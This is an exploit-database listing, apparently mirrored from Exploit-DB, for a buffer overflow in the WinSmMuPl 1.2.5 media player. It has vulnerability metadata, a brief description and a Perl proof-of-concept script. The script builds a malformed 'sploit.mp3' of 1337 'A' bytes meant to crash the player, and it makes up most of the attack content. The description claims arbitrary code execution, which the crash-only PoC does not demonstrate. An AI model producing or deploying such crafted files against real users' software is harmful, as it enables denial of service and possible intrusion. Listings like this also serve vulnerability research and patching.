header-logo
Suggest Exploit
vendor:
WinSmMuPl
by:
cr4wl3r
9,3
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: WinSmMuPl
Affected Version From: 1.2.5
Affected Version To: 1.2.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

WinSmMuPl 1.2.5 (.mp3) Local Crash PoC

WinSmMuPl 1.2.5 is vulnerable to a buffer overflow vulnerability when a specially crafted .mp3 file is opened. When the file is opened, the application crashes due to the overflow of the buffer. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Users should avoid opening untrusted .mp3 files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/perl

# WinSmMuPl 1.2.5 (.mp3) Local Crash PoC

#[+] Discovered By: cr4wl3r


print "#####################################################\n";
print "[!] WinSmMuPl 1.2.5 (.mp3) Local Crash PoC\n";
print "\n";
print "[!] By: cr4wl3r\n";
print "#####################################################\n";


my $boom = "A" x 1337;
my $filename = "sploit.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "\nDone!\n";

Navigation

Suggest Exploit

Services By CQR